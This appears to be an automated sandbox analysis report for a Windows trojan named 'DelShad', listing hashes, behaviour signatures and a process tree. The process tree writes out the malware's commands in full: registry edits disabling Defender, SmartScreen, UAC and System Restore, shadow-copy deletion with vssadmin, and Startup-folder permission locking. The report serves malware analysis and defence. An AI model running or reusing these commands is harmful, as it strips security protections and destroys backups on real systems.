Analysis
- max time kernel: 29s
- max time network: 34s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 14-11-2024 23:57

Static task: static1
Behavioral task: behavioral1
- Sample: Trojan.Win32.DelShad.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: Trojan.Win32.DelShad.exe
- Resource: win10v2004-20241007-en
Behavioral task: behavioral3
- Sample: Trojan.Win32.DelShad.exe
- Resource: win10ltsc2021-20241023-en
Behavioral task: behavioral4
- Sample: Trojan.Win32.DelShad.exe
- Resource: win11-20241007-en

General
- Target: Trojan.Win32.DelShad.exe
- Size: 30.2MB
- MD5: 52cc1d2fbc403848c18f3c95dd63d727
- SHA1: 9c5067b86ffc4ab6908aea7d9adf0b82353db3af
- SHA256: a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
- SHA512: 7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
- SSDEEP: 393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
Modifies Windows Defender notification settings
Processes:
- reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1"
- reg.exe: Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions
UAC bypass
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0"
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0"
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0"
Windows security bypass
Processes:
- rEG.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0"
- rEg.EXE: Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns
- rEg.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0"
- rEg.EXE: Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns
- rEg.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0"
- rEG.EXE: Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Disables use of System Restore points 1 TTPs
Drops file in Drivers directory 1 IoCs
Processes:
- cmd.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Drops startup file 1 IoCs
Processes:
- Trojan.Win32.DelShad.tmp: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
Executes dropped EXE 17 IoCs
Processes:
- PID 2328 Trojan.Win32.DelShad.tmp
- PID 2760 Trojan.Win32.DelShad.tmp
- PID 2268 pik.exe
- PID 2744 rp.exe
- PID 2944 rp.exe
- PID 2740 rp.exe
- PID 2888 rp.exe
- PID 2504 rp.exe
- PID 2352 rp.exe
- PID 3020 rp.exe
- PID 2948 rp.exe
- PID 1680 rp.exe
- PID 892 rp.exe
- PID 1692 rp.exe
- PID 2876 rp.exe
- PID 980 Windows11InstaIIation.scr
- PID 1312 Windows11InstaIIation.sCr
Loads dropped DLL 9 IoCs
Processes:
- PID 2136 Trojan.Win32.DelShad.exe
- PID 2820 Trojan.Win32.DelShad.exe
- PID 2760 Trojan.Win32.DelShad.tmp
- PID 3016
- PID 2280 cmd.exe
- PID 2280 cmd.exe
- PID 2280 cmd.exe
- PID 2280 cmd.exe
- PID 2760 Trojan.Win32.DelShad.tmp
Modifies file permissions 1 TTPs 2 IoCs
Processes:
- PID 796 icacls.exe
- PID 2072 icacls.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
- Windows11InstaIIation.scr (PID 980): set thread context of 1312 (procid_target 131)
Drops file in Windows directory 1 IoCs
Processes:
- makecab.exe: File created C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (all 24 entries: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language):
- Trojan.Win32.DelShad.exe, Trojan.Win32.DelShad.tmp, rp.exe, rp.exe, rp.exe, rp.exe, cmd.exe, Trojan.Win32.DelShad.tmp, rp.exe, rp.exe, cmd.exe, rp.exe, rp.exe, rp.exe, cmd.exe, Trojan.Win32.DelShad.exe, taskkill.exe, rp.exe, rp.exe, rp.exe, Windows11InstaIIation.scr, cmd.exe, cmd.exe, Windows11InstaIIation.sCr
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
- PID 1908 find.exe
- PID 2368 find.exe
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- PID 2392 vssadmin.exe
Kills process with taskkill 1 IoCs
Processes:
- PID 2276 taskkill.exe
Modifies data under HKEY_USERS 12 IoCs
Processes (all by rp.exe):
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (4 entries)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (4 entries)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (4 entries)
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (each listed twice in the report):
- PID 2760 Trojan.Win32.DelShad.tmp
- PID 2744 rp.exe
- PID 2740 rp.exe
- PID 2944 rp.exe
- PID 2504 rp.exe
- PID 2888 rp.exe
- PID 2948 rp.exe
- PID 1680 rp.exe
- PID 1692 rp.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- taskkill.exe (PID 2276): Token: SeDebugPrivilege
- pik.exe (PID 2268): Token: SeDebugPrivilege
- vssvc.exe (PID 876): Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- rp.exe (PID 2744): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- rp.exe (PID 2944): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- rp.exe (PID 2740): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- rp.exe (PID 2504): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- rp.exe (PID 2888): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- rp.exe (PID 2948): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- rp.exe (PID 1680): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- rp.exe (PID 1692): Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- WMIC.exe (PID 1900): Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- PID 2760 Trojan.Win32.DelShad.tmp
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- PID 980 Windows11InstaIIation.scr
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- Trojan.Win32.DelShad.exe (PID 2136) wrote to memory of 2328, procid_target 30 (7 entries)
- Trojan.Win32.DelShad.tmp (PID 2328) wrote to memory of 2820, procid_target 31 (7 entries)
- Trojan.Win32.DelShad.exe (PID 2820) wrote to memory of 2760, procid_target 32 (7 entries)
- Trojan.Win32.DelShad.tmp (PID 2760) wrote to memory of 2276, procid_target 33 (4 entries)
- Trojan.Win32.DelShad.tmp (PID 2760) wrote to memory of 2268, procid_target 36 (4 entries)
- WScript.exe (PID 1076) wrote to memory of 800, procid_target 40 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1764, procid_target 42 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1668, procid_target 43 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1356, procid_target 44 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1664, procid_target 45 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1756, procid_target 46 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1708, procid_target 47 (3 entries)
- cmd.exe (PID 800) wrote to memory of 2400, procid_target 48 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1652, procid_target 49 (3 entries)
- cmd.exe (PID 800) wrote to memory of 2376, procid_target 50 (3 entries)
- cmd.exe (PID 800) wrote to memory of 1732, procid_target 51 (3 entries)
- cmd.exe (PID 800) wrote to memory of 892, procid_target 52 (2 entries)
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 1 IoCs
Processes (bracketed number = nesting level in the process tree)
[1] C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe (PID 2136)
    Command: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp (PID 2328)
      Command: "C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp" /SL5="$50150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe (PID 2820)
        Command: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp (PID 2760)
          Command: "C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp" /SL5="$60150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
          - Drops startup file
          - Executes dropped EXE
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\taskkill.exe (PID 2276)
            Command: "C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
            - System Location Discovery: System Language Discovery
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe (PID 2268)
            Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\cmd.exe (PID 2280)
            Command: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd""
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
          [6] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2744)
              Command: rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2944)
                Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2352)
                  Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEG.EXE (PID 1148)
                    Command: "C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2740)
              Command: rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2888)
                Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 3020)
                  Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEg.EXE (PID 1708)
                    Command: "C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2504)
              Command: rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2948)
                Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 892)
                  Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEg.EXE (PID 2484)
                    Command: "C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 1680)
              Command: rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 1692)
                Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe (PID 2876)
                  Command: "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEG.EXE (PID 2472)
                    Command: "C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
        [5] C:\Windows\SysWOW64\cmd.exe (PID 2016)
            Command: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd""
            - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\cmd.exe (PID 1348)
              Command: C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\cmd.exe (PID 1232)
              Command: C:\Windows\system32\cmd.exe /c cuRL -S IPINfo.Io/city
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\cmd.exe (PID 1612)
              Command: C:\Windows\system32\cmd.exe /c CUrl -s IPiNfo.io/country
              - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr (PID 980)
            Command: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of SetWindowsHookEx
          [6] C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr (PID 1312)
              Command: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
[1] C:\Windows\System32\WScript.exe (PID 1076)
    Command: "C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe (PID 800)
      Command: cmd /c ""C:\tmp\.cmd" "
      - Drops file in Drivers directory
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1764)
        Command: rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
        - UAC bypass
    [3] C:\Windows\system32\reg.exe (PID 1668)
        Command: reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
        - UAC bypass
    [3] C:\Windows\system32\reg.exe (PID 1356)
        Command: rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
        - UAC bypass
    [3] C:\Windows\system32\reg.exe (PID 1664)
        Command: reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
    [3] C:\Windows\system32\reg.exe (PID 1756)
        Command: reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
    [3] C:\Windows\system32\reg.exe (PID 1708)
        Command: reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
    [3] C:\Windows\system32\reg.exe (PID 2400)
        Command: rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
    [3] C:\Windows\system32\reg.exe (PID 1652)
        Command: rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
    [3] C:\Windows\system32\reg.exe (PID 2376)
        Command: reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
    [3] C:\Windows\system32\reg.exe (PID 1732)
        Command: rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
    [3] C:\Windows\system32\reg.exe (PID 892)
        Command: rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
    [3] C:\Windows\system32\reg.exe (PID 844)
        Command: reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
    [3] C:\Windows\system32\reg.exe (PID 628)
        Command: rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
    [3] C:\Windows\system32\reg.exe (PID 2216)
        Command: reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe (PID 560)
        Command: reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
        - Modifies Windows Defender notification settings
    [3] C:\Windows\system32\reg.exe (PID 2212)
        Command: reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 2528)
        Command: rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 3028)
        Command: reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 692)
        Command: reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 1052)
        Command: rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
    [3] C:\Windows\system32\reg.exe (PID 768)
        Command: reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 2984)
        Command: rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 3032)
        Command: reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 1124)
        Command: rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 2300)
        Command: rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
    [3] C:\Windows\system32\reg.exe (PID 1500)
        Command: reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe (PID 3044)
        Command: rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
    [3] C:\Windows\system32\icacls.exe (PID 796)
        Command: icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 2072)
        Command: iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
        - Modifies file permissions
    [3] C:\Windows\system32\vssadmin.exe (PID 2392)
        Command: vssadmin dELETe shadOws /aLl /QuIEt
        - Interacts with shadow copies
    [3] C:\Windows\system32\attrib.exe (PID 2808)
        Command: aTTrIb +S +H C:\TMP
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\find.exe (PID 2296)
        Command: find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2196)
        Command: find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2700)
        Command: find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2520)
